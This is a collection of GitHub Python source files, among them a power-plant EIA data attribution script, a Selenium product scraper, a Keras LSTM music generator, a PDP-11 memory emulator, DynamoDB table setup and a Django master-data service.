files\nimport pandas as pd\n\n\ndef secondary_prompt(subject_id, output_folder):\n all_the_files = files.get_files(output_folder, \"block\", \".csv\")[2]\n all_the_files.sort()\n try:\n last_file = all_the_files[-1]\n dem_data = pd.read_csv(last_file)\n age_prev = dem_data.age.unique()[0]\n gender_prev = dem_data.gender.unique()[0]\n block_prev = dem_data.block.unique()[0]\n exp_info = {\n \"ID (sub-xxx)\": subject_id,\n \"age\": age_prev,\n \"gender (m/f/o)\": gender_prev,\n \"block\": block_prev + 1\n }\n return exp_info\n except:\n exp_info = {\n \"ID (sub-xxx)\": subject_id,\n \"age\": \"ADD_AGE\",\n \"gender (m/f/o)\": \"ADD_GENDER\",\n \"block\": 0\n }\n return exp_info\n","repo_name":"maciekszul/DANC_EXP_grasp_change","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71236021363","text":"# this script has an `format` argument\n# pylint: disable=redefined-builtin\n\"\"\"\n Generic method to handle conversion failures ans still return something to use\n to explain what when wrong, etc.\n\"\"\"\nVALID_IMAGE_FORMAT_LIST = ('jpg', 'jpeg', 'png', 'gif', 'pnm', 'ppm', 'tiff')\n\n# some good defaults\nmimetype = \"text/plain\"\ndata = \"Conversion failure\"\n\nif 
format in VALID_IMAGE_FORMAT_LIST:\n # default image is an OFSImage so even if conversion engine is down\n # we are still able to deliver it\n default_image = getattr(context, \"default_conversion_failure_image\", None)\n if default_image is not None:\n mimetype = default_image.getContentType()\n data = default_image.index_html(context.REQUEST, context.REQUEST.RESPONSE)\n\nreturn mimetype, data\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_dms/SkinTemplateItem/portal_skins/erp5_dms/Document_getFailsafeConversion.py","file_name":"Document_getFailsafeConversion.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"26426440890","text":"# By Dominic Eggerman\n# Imports\nimport getpass\nimport psycopg2\nimport pandas as pd\nimport numpy as np\nimport json\nimport datetime\nimport argparse\nimport scipy.stats as scistats\nimport matplotlib.pyplot as plt\nfrom urllib.error import URLError, HTTPError\nfrom urllib.request import urlopen\nimport readfile\n\n\n# EIA API query to get data from a plant code\ndef EIAPlantData(key, plant_code):\n # Construct URL\n url = \"http://api.eia.gov/series/?api_key={0}&series_id=ELEC.PLANT.CONS_TOT.{1}-NG-ALL.M\".format(key, plant_code)\n\n try:\n # URL request, opener, reader\n response = urlopen(url)\n raw_byte = response.read()\n raw_string = str(raw_byte, \"utf-8-sig\")\n\n # Convert to JSON\n jso = json.loads(raw_string)\n\n # Convert JSON data we want to dataframe\n noms_data = jso[\"series\"][0][\"data\"]\n noms_df = pd.DataFrame(data=noms_data, columns=[\"eia_date\", \"eia_noms\"])\n noms_df = noms_df.iloc[::-1] # Reverse df - oldest to newest\n dates = [datetime.datetime.strptime(\"{0}-{1}-{2}\".format(s[:4], s[4:6], \"01\"), \"%Y-%m-%d\").date() for s in noms_df[\"eia_date\"].values] # Convert string to datetime\n noms_df = noms_df.replace(noms_df[\"eia_date\"].values, dates)\n # Get lat/long and start/end dates\n plant_lat, plant_long = float(jso[\"series\"][0][\"lat\"]), float(jso[\"series\"][0][\"lon\"])\n start_month, end_month = jso[\"series\"][0][\"start\"], jso[\"series\"][0][\"end\"]\n\n # Return all as a dictionary\n return {\"plant_code\":plant_code, \"noms_data\":noms_df, \"lat\":plant_lat, \"long\":plant_long, \"start_date\":start_month, \"end_date\":end_month}\n\n except HTTPError as err:\n print(\"HTTP error...\")\n print(\"Error code:\", err.code)\n\n except URLError as err:\n print(\"URL type error...\")\n print(\"Reason:\", err.reason)\n\n except KeyError:\n return None\n\n\n# Connect to insightprod database\ndef connect(usr, pswrd):\n # Establish connection with username and password\n conn = psycopg2.connect(dbname=\"insightprod\", user=usr, password=pswrd, host=\"insightproddb\")\n # print(\"Successfully connected to database...\")\n return conn\n\n\n# Get location IDs and matching plant codes\ndef locationPlantMap(conn):\n # SQL statement\n statement = \"\"\"SELECT lpm.location_id, plt.eia_plant_code FROM ts1.location_plant_map AS lpm\n INNER JOIN ts1.plant AS plt ON lpm.plant_id = plt.id\n ORDER BY location_id\n \"\"\"\n\n try:\n # Read SQL and return\n print(\"Getting plant codes and location IDs...\")\n df = pd.read_sql(statement, conn)\n return df\n except:\n print(\"locationPlantMap(): Error encountered while executing SQL. Exiting...\")\n conn.close()\n return None\n\n\n# Get nominations data for a single location id\ndef getCapacityData(conn, plt_id): # ?? 
No notice ??\n statement = \"\"\"SELECT date_trunc('month', ctnn.gas_day)::date AS insight_date, SUM((ctnn.scheduled_cap) * r.sign * -1) AS insight_noms\n FROM analysts.captrans_with_no_notice AS ctnn\n INNER JOIN analysts.location_role_v AS lr ON ctnn.location_role_id = lr.id\n INNER JOIN analysts.location_v AS l ON lr.location_id = l.id\n INNER JOIN analysts.role_v AS r ON lr.role_id = r.id\n INNER JOIN ts1.location_plant_map AS lpm ON lpm.location_id = l.id\n INNER JOIN ts1.plant AS plt ON plt.id = lpm.plant_id\n WHERE ctnn.gas_day BETWEEN '2014-01-01' AND '2018-05-31'\n AND plt.eia_plant_code = {0}\n GROUP BY 1\n \"\"\".format(plt_id)\n \n try:\n # Read SQL and return\n df = pd.read_sql(statement, conn)\n return df\n except:\n print(\"getCapacityData(): Error encountered while executing SQL. Exiting...\")\n conn.close()\n return None\n\n\n# Get plants that have already been analyze\ndef analyzedPlants():\n analyzed_plts = []\n with open(\"attribution_issues.txt\", mode=\"r\") as file1:\n for line in file1:\n try:\n plt = line.rstrip().split(\"|\")[1].split(\":\")[1].strip()\n analyzed_plts.append(int(plt))\n except IndexError:\n pass\n with open(\"confirmed_attributions.txt\", mode=\"r\") as file2:\n for line in file2:\n try:\n plt = line.rstrip().split(\"|\")[1].split(\":\")[1].strip()\n analyzed_plts.append(int(plt))\n except IndexError:\n pass\n with open(\"database_issues.txt\", mode=\"r\") as file3:\n for line in file3:\n try:\n plt = line.rstrip().split(\"|\")[1].split(\":\")[1].strip()\n analyzed_plts.append(int(plt))\n except IndexError:\n pass\n return analyzed_plts\n\n\n# Merge EIA and insight dataframes\ndef mergeDf(eia, insight):\n # Merge dataframes\n merged_df = eia[\"noms_data\"].join(insight.set_index(\"insight_date\"), on=\"eia_date\")\n # Take only rows with non-NaN values\n merged_df = merged_df[pd.notnull(merged_df['insight_noms'])]\n # Check length of array\n if len(merged_df[\"insight_noms\"].values) <= 5: # What number should go here??\n pass\n # Logic for handling in loop\n\n return merged_df\n\n\n# Sum nominations in dataframe for same dates\ndef truncateDates(df):\n # Start a count log (for purposes of having 2, 3, or 4 loc_ids)\n num_locs = 1\n # Loop through dates\n for ind in range(len(df[\"eia_date\"].values)):\n try:\n if df[\"eia_date\"].values[ind] == df[\"eia_date\"].values[ind+1]:\n num_locs += 1\n else:\n break\n except:\n pass\n # Filter dates and EIA noms\n dates = df[\"eia_date\"].values[::num_locs]\n eia_noms = df[\"eia_noms\"].values[::num_locs]\n # Sum inisght noms\n insight_noms = [sum(df[\"insight_noms\"].values[i:i+num_locs]) for i in range(0, len(df[\"insight_noms\"].values), num_locs)]\n\n return pd.DataFrame({\"eia_date\":dates, \"eia_noms\":eia_noms, \"insight_noms\":insight_noms})\n \n\n\n# Score the r2 of a merged dataframe\ndef scoreR2(df):\n try:\n # Score the R squared\n r = scistats.linregress(df[\"eia_noms\"].values, df[\"insight_noms\"].values).rvalue\n r2 = r * r # Get R2\n return r2\n except ValueError:\n return None\n\n\n# Plot EIA data versus insight data\ndef plotNominations(df, loc, plt_code, r2):\n # Plot\n ax = plt.axes()\n ax.plot(merged_df[\"eia_date\"].values, merged_df[\"eia_noms\"].values)\n ax.plot(merged_df[\"eia_date\"].values, merged_df[\"insight_noms\"].values)\n # Title / axis labels / legend / r2 value\n plt.title(\"Location ID: {0} Plant code: {1}\".format(loc, plt_code))\n plt.ylabel(\"Mcf/d\")\n plt.xticks(rotation=90)\n legend = plt.legend([\"EIA data\", \"Insight data\"], frameon=False)\n 
legend.draggable()\n plt.text(0.9, 1.05, \"$R^2$ = {:.4f}\".format(r2), ha=\"center\", va=\"center\", transform=ax.transAxes)\n # Fix layout and show\n plt.tight_layout()\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n # Argparse and add arguments\n parser = argparse.ArgumentParser(description=\"Below is a list of optional arguements with descriptions. Please refer to README.md for full documentation...\")\n parser.add_argument(\"-g\", \"--graph\", help=\"Do not display graph.\", action=\"store_false\")\n parser.add_argument(\"-m\", \"--master\", help=\"Use masterCapData.csv to get insight noms (faster).\", action=\"store_false\") #Change this name\n options = parser.parse_args()\n\n # Get login creds for insightprod and EIA API\n creds = readfile.readFile(\"creds.txt\")\n username, password, eia_key = creds[0], creds[1], creds[2]\n \n # Refactor all this ??\n # Use master file to compare insight data to EIA\n if options.master:\n # Read master data file\n master_df = pd.read_csv(\"masterCapData.csv\")\n\n # List of previously analyzed plants\n analyzed_plants = analyzedPlants()\n\n # Iterate through unique EIA plant codes\n for ind, plant in enumerate(list(set(master_df[\"plant_code\"].values))):\n print(\"Analyzing plant: {0} | {1}/{2}\".format(plant, ind, len(list(set(master_df[\"plant_code\"].values)))))\n\n # Skip if plant has been analyzed\n if plant in analyzed_plants:\n print(\"Plant already analyzed. Skipping.\")\n continue\n\n # Filter the data for a single plant\n cap_data = master_df.loc[master_df[\"plant_code\"] == plant]\n # Get location ID / ID's\n location_id = list(set(cap_data[\"location_id\"].values))\n # Drop unnecessary columns and convert dates from str to datetime\n cap_data = cap_data.drop(columns=[\"location_id\", \"plant_code\"])\n dates = [datetime.datetime.strptime(\"{0}-{1}-{2}\".format(d[:4], d[5:7], d[8:10]), \"%Y-%m-%d\").date() for d in cap_data[\"insight_date\"].values]\n cap_data = cap_data.replace(cap_data[\"insight_date\"].values, dates)\n\n # Obtain EIA data\n eia_data = EIAPlantData(eia_key, plant)\n if eia_data is None:\n print(\"EIA data error.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, datetime.datetime.now().date()))\n continue\n\n # Merge the dataframes\n merged_df = truncateDates(mergeDf(eia_data, cap_data))\n\n # Score the r2\n r2 = scoreR2(merged_df)\n if r2 is None:\n print(\"No overlapping values on which to grade r2.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, datetime.datetime.now().date()))\n continue\n\n # Plot the results\n if options.graph:\n plotNominations(merged_df, location_id, plant, r2)\n\n # Confirm / reject attribution\n if r2 >= 0.50:\n print(\"Attribution confirmed (r2 > 50)\")\n with open(\"confirmed_attributions.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, r2, datetime.datetime.now().date()))\n elif r2 < 0.50:\n print(\"Attribution issue (r2 < 50)\")\n with open(\"attribution_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(\";\".join(map(str,tuple(location_id))), plant, r2, datetime.datetime.now().date()))\n 
else:\n print(\"Point not confirmed or unconfirmed...\")\n\n\n # Run a query each time\n else:\n # Connect, get location IDs and matching plant codes\n connection = connect(username, password)\n try:\n plant_locs = locationPlantMap(connection)\n print(\"Found {0} attributed plants in insightprod\".format(len(plant_locs[\"location_id\"].values)))\n except:\n connection.close()\n print(\"Error encountered while querying for plant locations and codes.\")\n\n # Update with new ??\n # # Remove plants from list that have already been analyzed\n # analyzed_locs = analyzedPlants()\n # for loc in analyzed_locs:\n # plant_locs = plant_locs[plant_locs.location_id != loc]\n \n print(\"{0} plants have not been analyzed\".format(len(plant_locs[\"location_id\"].values)))\n\n # Close connection\n connection.close()\n\n # Iterate through the \"confirmed\" plants\n for ind, (location_id, plant_code) in enumerate(zip(plant_locs[\"location_id\"].values, plant_locs[\"eia_plant_code\"].values)):\n # Open connection\n connection = connect(username, password)\n\n print(\"| Analyzing Plant {0} / {1} |\".format(ind+1, len(plant_locs[\"location_id\"].values)))\n try:\n # Obtain EIA and insight data\n eia_data = EIAPlantData(eia_key, plant_code)\n cap_data = getCapacityData(connection, plant_code)\n except:\n connection.close()\n print(\"Error accessing EIA / insight nominations data.\")\n\n # Error Check\n if cap_data is None:\n print(\"No capacity data returned.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(location_id, plant_code, datetime.datetime.now().date()))\n continue\n\n # Merge the dataframes\n merged_df = mergeDf(eia_data, cap_data)\n\n # Score the r2\n r2 = scoreR2(merged_df)\n if r2 is None:\n print(\"No overlapping values on which to grade r2.\")\n with open(\"database_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : undefined | date_att: {}\\n\".format(location_id, plant_code, datetime.datetime.now().date()))\n continue\n\n # Plot the results\n if options.graph:\n plotNominations(merged_df, location_id, plant_code, r2)\n\n # Confirm / reject attribution\n if r2 >= 0.50:\n print(\"Attribution confirmed (r2 > 50)\")\n with open(\"confirmed_attributions.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(location_id, plant_code, r2, datetime.datetime.now().date()))\n elif r2 < 0.50:\n print(\"Attribution issue (r2 < 50)\")\n with open(\"attribution_issues.txt\", mode=\"a\") as logfile:\n logfile.write(\"loc_id : {} | plant_code : {} | R2 : {:.4f} | date_att: {}\\n\".format(location_id, plant_code, r2, datetime.datetime.now().date()))\n else:\n print(\"Point not confirmed or unconfirmed...\")\n \n # Close connection\n connection.close()","repo_name":"dominiceggerman/EIAPlantAttribution","sub_path":"attributePlant.py","file_name":"attributePlant.py","file_ext":"py","file_size_in_byte":14437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30735280127","text":"# Import necessary libraries\nimport csv\nimport re\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom bs4 import BeautifulSoup\n\n# Initialize the browser with 
headless option\nchrome_options = Options()\nchrome_options.add_argument('--headless')\ndriver = webdriver.Chrome(options=chrome_options)\n\n# Set the URL to scrape\nurl = 'https://galamart.ru/catalog/hoztovary/'\ndriver.get(url)\n\n# Set implicit wait to give the page time to load\ndriver.implicitly_wait(10)\n\n# Initialize explicit wait for the \"More\" button\nwait = WebDriverWait(driver, 10)\n\n# Set URL pattern for the pages to scrape\nurl_page = 'https://galamart.ru/catalog/hoztovary/page-'\n\n# Loop through each page and scrape the data\nfor page_number in range(2, 31):\n # Build the full URL for each page\n url_full = url_page + str(page_number) + '/'\n driver.get(url_full)\n\n # Wait for the page to load\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'div.col.main-content')))\n\n # Get the HTML code after all the cards have loaded\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n\n # Find the card block\n product_list = soup.find('div', {'class': 'col main-content'})\n\n # Loop through each card and extract the title and price\n notebooks = []\n for product in product_list.find_all('div', {'class': 'catalog-card'}):\n title = product.find('span', {'itemprop': 'name'}).text.strip()\n price = product.find('div', {'class': 'product-price'}).text.strip()\n price_digits = int(re.sub('\\D', '', price))\n notebooks.append({'title': title, 'price': price_digits})\n\n # Sort the list of notebooks by price in descending order\n notebooks_sorted = sorted(notebooks, key=lambda x: x['price'], reverse=True)\n\n # Write the notebook information to a CSV file\n with open('galamart.csv', 'a', encoding='utf-8', newline='') as csvfile:\n fieldnames = ['title', 'price']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for notebook in notebooks_sorted:\n writer.writerow(notebook)\n\n# Close the browser\ndriver.quit()\n","repo_name":"AlexBalind70/Parcing-Example","sub_path":"WEB-Parcing/Library BeautifulSoup and Selenium Example №2.py","file_name":"Library BeautifulSoup and Selenium Example №2.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26238990858","text":"import glob\nimport keras\nimport numpy\nimport pickle\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.layers import Activation\nfrom keras.layers import BatchNormalization as BatchNorm\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential\nfrom music21 import *\n\nnotes = []\nfor file in glob.glob(\"midi_songs/*.mid\"):\n try:\n midi = converter.parse(file)\n notes_to_parse = None\n parts = instrument.partitionByInstrument(midi)\n if parts: # file has instrument parts\n notes_to_parse = parts.parts[0].recurse()\n else: # file has notes in a flat structure\n notes_to_parse = midi.flat.notes\n for element in notes_to_parse:\n if isinstance(element, note.Note):\n notes.append(str(element.pitch))\n elif isinstance(element, chord.Chord):\n notes.append('.'.join(str(n) for n in element.normalOrder))\n except:\n print(file+\" failed\")\n\n with open('data/notes', 'wb') as filepath:\n pickle.dump(notes, filepath)\n\nn_vocab = len(set(notes))\nsequence_length = 100\n# get all pitch names\npitchnames = sorted(set(item for item in notes))\n# create a dictionary to map pitches to integers\nnote_to_int = 
dict((note, number) for number, note in enumerate(pitchnames))\nnetwork_input = []\nnetwork_output = []\n# create input sequences and the corresponding outputs\nfor i in range(0, len(notes) - sequence_length, 1):\n sequence_in = notes[i:i + sequence_length]\n sequence_out = notes[i + sequence_length]\n network_input.append([note_to_int[char] for char in sequence_in])\n network_output.append(note_to_int[sequence_out])\nn_patterns = len(network_input)\n# reshape the input into a format compatible with LSTM layers\nnetwork_input = numpy.reshape(network_input, (n_patterns, sequence_length, 1))\n# normalize input\nnetwork_input = network_input / float(n_vocab)\nnetwork_output = np_utils.to_categorical(network_output)\n\n#Training\nmodel = Sequential()\nmodel.add(LSTM(\n 256,\n input_shape=(network_input.shape[1], network_input.shape[2]),\n return_sequences=True\n ))\nmodel.add(Dropout(0.3))\nmodel.add(LSTM(512, return_sequences=True))\nmodel.add(Dropout(0.3))\nmodel.add(LSTM(256))\nmodel.add(Dense(256))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(n_vocab))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n\n#Save output at the end of each epoch -> terminate once satisfied with loss value\nfilepath = \"weights-improvement-{epoch:02d}-{loss:.4f}-bigger.hdf5\" \ncheckpoint = ModelCheckpoint(\n filepath, monitor='loss', \n verbose=0, \n save_best_only=True, \n mode='min'\n) \ncallbacks_list = [checkpoint] \nmodel.fit(network_input, network_output, epochs=200, batch_size=64, callbacks=callbacks_list)","repo_name":"gopuman/MusicGen","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17417921345","text":"# -*- coding: utf-8 -*-\n\nimport random\n\nclass Memory() :\n def __init__(self) :\n self.memory = None\n self.mode = \"word\"\n\n self.resetByZero()\n\n def setMode(self, mode) :\n assert mode == 'byte' or mode == 'word', 'mode must be \"byte\" or \"word\"'\n self.mode = mode\n\n def __setitem__(self, index, value) :\n if isinstance(index, slice) :\n if isinstance(index.stop, str) :\n mode = self.mode\n self.setMode(index.stop)\n self[index.start] = value\n self.setMode(mode)\n else :\n self.memory.__setitem__(index, value)\n else :\n if self.mode == 'byte' :\n self.memory[index&0xffff] = value&0xff\n elif self.mode == 'word' :\n self.memory[index&0xffff] = value&0xff\n self.memory[(index+1)&0xffff] = (value>>8)&0xff\n else :\n raise AssertionError('mode must be \"byte\" or \"word\"')\n\n def __getitem__(self, index) :\n if isinstance(index, slice) :\n if isinstance(index.stop, str) :\n mode = self.mode\n self.setMode(index.stop)\n value = self[index.start]\n self.setMode(mode)\n return value\n else :\n return self.memory.__getitem__(index)\n else :\n if self.mode == 'byte' :\n return self.memory[index&0xffff]\n elif self.mode == 'word' :\n return (self.memory[(index+1)&0xffff]<<8)+self.memory[index&0xffff]\n else :\n raise AssertionError('mode must be \"byte\" or \"word\"')\n\n def load(self, data, point=0) :\n self.memory[point:point+len(data)] = data\n\n def resetByRandom(self) :\n self.memory = [ random.randint(0, 255) for x in range(65536) ]\n\n def resetByZero(self) :\n self.memory = [ 0 for x in range(65536) 
]\n\n","repo_name":"miettal/pypdp11simulator","sub_path":"pdp11_memory.py","file_name":"pdp11_memory.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15408488726","text":"import logging\n\nimport boto3\nfrom api.utils.env_utils import get_env\n\nenv = get_env()\n\nlogging.debug('ENV = ' + env)\n\ntables_created = False\n\n\ndef create_tables(d):\n logging.debug('creating tables')\n\n logging.debug('creating user table')\n # user\n d.create_table(\n TableName='netify_user',\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH' # Partition key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'email',\n 'AttributeType': 'S'\n }\n\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n },\n GlobalSecondaryIndexes=[\n {\n 'IndexName': 'email-index',\n 'KeySchema': [\n {\n 'AttributeName': 'email',\n 'KeyType': 'HASH' # Partition key\n }\n ],\n 'Projection': {\n 'ProjectionType': 'ALL'\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n }\n ]\n )\n\n logging.debug('creating message table')\n # message\n d.create_table(\n TableName='netify_message',\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH' # Partition key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n )\n\n\n\n\nif env == 'PROD':\n dynamo_db = boto3.resource('dynamodb')\nelse:\n dynamo_db = boto3.resource('dynamodb', endpoint_url='http://localhost:8000')\n if not tables_created:\n try:\n create_tables(dynamo_db)\n tables_created = True\n logging.debug(\"****All tables created\")\n except Exception as e:\n logging.debug('bleep encountered')\n logging.debug(e)\n\n\n\n\n","repo_name":"fir-min/netify","sub_path":"back_end/netify/api/data_access/dynamo_db.py","file_name":"dynamo_db.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73612201841","text":"from django.apps import apps\nfrom django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404\n\nfrom ec_base.common.constant import message\nfrom ec_base.common.constant.app_label import ModelAppLabel\nfrom ec_base.common.constant.db_table import DBTable\nfrom ec_base.common.constant.service import Master\nfrom ec_base.common.utils.exceptions import APIErr\nfrom ec_base.master.serializers.base_master import BaseMasterListSlz, BaseMasterRetrieveSlz, BaseMasterCreateSlz\nfrom ec_base.master.serializers.discount_rate import MasterDiscountRateSlz\nfrom ec_base.master.serializers.district import MasterDistrictSlz\n\n\nclass MasterBaseService:\n def __init__(self, master_name):\n self.master_name = master_name\n self.table_name, self.model_name, self.allowed_to_create = Master.unpack(master_name)\n self.app_label = ModelAppLabel.MASTER\n self.model = apps.get_model(self.app_label, self.model_name)\n\n def get_item_by_id(self, pk):\n return get_object_or_404(self.model, pk=pk)\n\n def list(self, parent_id=None):\n queryset = self.model.objects.all().filter()\n if self.master_name == DBTable.MASTER_DISTRICT and parent_id is not None:\n return queryset.filter(city_id=parent_id)\n\n return queryset\n\n def create(self, data):\n try:\n serializer_class = 
self.get_master_create_serializer()\n serializer = serializer_class(data=data)\n serializer.is_valid(raise_exception=True)\n instances = self.model.objects.filter(**serializer.validated_data)\n if len(instances) > 0:\n instance = instances.first()\n instance.is_deleted = False\n instance.save()\n else:\n instance = self.model.objects.create(**serializer.validated_data)\n\n serializer = BaseMasterRetrieveSlz(instance)\n return serializer\n except IntegrityError:\n raise APIErr(message.DUPLICATE_ENTRY)\n\n def delete(self, pk):\n instance = self.get_item_by_id(pk)\n instance.is_deleted = True\n instance.save()\n\n def get_master_list_serializer(self, *args, **kwargs):\n slz_switcher = {\n DBTable.MASTER_DISTRICT: MasterDistrictSlz,\n DBTable.MASTER_DISCOUNT_RATE: MasterDiscountRateSlz,\n }\n slz = slz_switcher.get(self.master_name, BaseMasterListSlz)\n return slz(*args, **kwargs)\n\n def get_master_create_serializer(self):\n if not self.allowed_to_create:\n raise APIErr(message.NOT_ALLOWED_TO_CREATE)\n\n return BaseMasterCreateSlz\n","repo_name":"tranhdq97/E-commerce","sub_path":"backend/ec_base/master/services/base_master.py","file_name":"base_master.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"40606781203","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport csv\nfrom datetime import datetime\nfrom collections import defaultdict\n\nclass ParsePostnummer(object):\n def __init__(self,infile='../data/Postnummerregister_utf8.txt'):\n \"\"\"\n Format: postnummer\\tpoststed\\tkommunekode\\tkommunenavn\\tkategori\n \"\"\"\n self.infile=infile\n self.pnlist=self.parsefile()\n self.pn_to_navn=self._pn_to_navn()\n self.pn_to_kkode=self._pn_to_kkode()\n\n def parsefile(self):\n with open(self.infile) as ff:\n pnlist=[]\n for line in ff:\n ss=line.split('\\t')\n ss=[s.strip() for s in ss]\n ss[0]=int(ss[0])\n ss[2]=int(ss[2])\n pnlist.append(ss)\n return pnlist\n\n def _pn_to_navn(self):\n return {s[0]:s[3] for s in self.pnlist}\n\n def _pn_to_kkode(self):\n return {s[0]:s[2] for s in self.pnlist}\n\nclass ParseAvisKategori(object):\n def __init__(self,infile='../data/avis_kategori.csv'):\n \"\"\"\n Format: postnummer\\tpoststed\\tkommunekode\\tkommunenavn\\tkategori\n \"\"\"\n self.infile=infile\n self.avis=self.parsefile()\n #print(self.aviser)\n\n\n def parsefile(self):\n with open(self.infile,newline='\\n') as ff:\n self.aviser=[]\n self.avisDict={}\n self.veiklasser=defaultdict(set)\n csvread = csv.reader(ff, delimiter='\\t')\n for iii,row in enumerate(csvread):\n row=[r.lower() for r in row]\n if iii==0:\n self.heads=row\n continue\n row[2]=int(row[2])\n\n if row[5]!='#n/a':\n row[5]=datetime.strptime(row[5],'%m/%d/%Y')\n self.veiklasser[row[2]].add(row[1])\n self.aviser.append(row)\n self.avisDict[row[1]]=row\n\n def avisVeiklasse(self,avis):\n try:\n return self.avisDict[avis.lower()][2]\n except KeyError as e:\n return -1\n\n def veiKlasseAvis(self,veiklasse,avis):\n return avis.lower() in self.veiklasser[veiklasse]\n\n\n\nif __name__ == \"__main__\":\n parseAvis=ParseAvisKategori()\n","repo_name":"Froskekongen/salestrack-processcustomer","sub_path":"src/parse_postnummer.py","file_name":"parse_postnummer.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70042903922","text":"\n# 以图书馆地图上南下北,leaflet 以左上角为原点\nfrom enum import Enum\nimport json\n\n# 
console.log(map.unproject([-w, -h], map.getMaxZoom()-1))\n\nmapImgWidth = 1789\nmapImgHeight = 1971\n\nlatLangX = 223.625\nlatLangY = -246.375\n\nfeatures = {\n \"type\": \"FeatureCollection\",\n \"features\": [\n ]\n}\n\n# 设定每个书架长2,宽0.5 ,过道宽1 (实际上书架为自由拼凑有长有短,\nshelfLength = 8\nshelfWidth = 2\naisleWidth = 1\n\n\nclass Towards(Enum):\n NorthSouth = True\n WestEast = False\n\n# towards : 书架朝向, True 南北 , False 西东\n\n\ndef getCoodinate(towards, x, y):\n coordinates = []\n if towards == Towards.NorthSouth:\n # left top, lb, rb, rt Polygons and MultiPolygons should follow the right-hand rule\n coordinates = [\n [x - shelfWidth/2, y + shelfLength/2],\n [x - shelfWidth/2, y - shelfLength/2],\n [x + shelfWidth/2, y - shelfLength/2],\n [x + shelfWidth/2, y + shelfLength/2],\n # the first and last positions in a LinearRing of coordinates must be the same\n [x - shelfWidth/2, y + shelfLength/2],\n ]\n else:\n coordinates = [\n [x - shelfLength/2, y + shelfWidth/2],\n [x - shelfLength/2, y - shelfWidth/2],\n [x + shelfLength/2, y - shelfWidth/2],\n [x + shelfLength/2, y + shelfWidth/2],\n [x - shelfLength/2, y + shelfWidth/2],\n ]\n return [coordinates]\n\n\ndef getFeature(northWestName, southEastName, towards, x, y):\n return {\n \"type\": \"Feature\",\n \"properties\": {\n \"northWestName\": \"{}\".format(northWestName),\n \"southEastName\": \"{}\".format(southEastName),\n },\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": getCoodinate(towards, x, y)\n }\n }\n\n\ndef getShelfOffsetX(offsetX, index):\n return offsetX + index * (shelfWidth + aisleWidth)\n\ndef zipNumbering(lList):\n index = 0\n zipped = []\n length = len(lList)\n if not length % 2 == 0:\n raise '书架编号长度非偶数'\n while(index < length-1):\n zipped.append([lList[index],lList[index+1]])\n index += 2\n return zipped 